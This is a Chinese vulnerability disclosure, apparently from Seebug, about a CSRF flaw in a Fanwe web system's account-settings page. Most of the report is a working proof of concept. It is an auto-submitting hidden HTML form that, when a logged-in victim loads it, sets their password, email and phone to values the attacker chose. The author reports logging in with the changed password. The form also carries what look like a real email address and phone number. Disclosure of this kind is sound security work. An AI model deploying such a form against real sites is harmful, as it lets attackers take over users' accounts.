### 简要描述:
方维某系统CSRF漏洞可修改用户密码(demo演示、通用型)#2,自己本地搭建测试了一下,果然通用型。
### 详细说明:
### 漏洞证明:
```
http://t2.fanwe.net:82/index.php?ctl=uc_account
```
在账户设置这里抓包了一下,发现没有任何的验证。现在我们构造一个表单,代码如下:
```
<html>
<body>
<form action="http://t2.fanwe.net:82/index.php?ctl=uc_account&act=save" method="POST">
<input type="hidden" name="email" value="296864045@qq.com" />
<input type="hidden" name="user_name" value="hackimg" />
<input type="hidden" name="user_pwd" value="hackimg" />
<input type="hidden" name="user_pwd_confirm" value="hackimg" />
<input type="hidden" name="avatar_file" value="" />
<input type="hidden" name="mobile" value="15768852222" />
<input type="hidden" name="province_id" value="6" />
<input type="hidden" name="city_id" value="76" />
<input type="hidden" name="byear" value="0" />
<input type="hidden" name="bmonth" value="0" />
<input type="hidden" name="bday" value="0" />
<input type="hidden" name="sex" value="1" />
<input type="hidden" name="my_intro" value="" />
<input type="hidden" name="id" value="951" />
<input type="hidden" name="commit" value="%E4%BF%AE%E6%94%B9" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
现在我们本地访问一下,结果如图:
[<img src="https://images.seebug.org/upload/201507/25185335e74e15e41570964a2a72e9df55d35455.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/25185335e74e15e41570964a2a72e9df55d35455.png)
然后刷新一下资料,发现账号还是登陆状态的,现在我们退出一下,最后我试了一下登陆不上,密码不对。然后用了一下我刚刚构造表单里面要修改的密码,然后就登陆上去了。这里我就不截图演示了!
暂无评论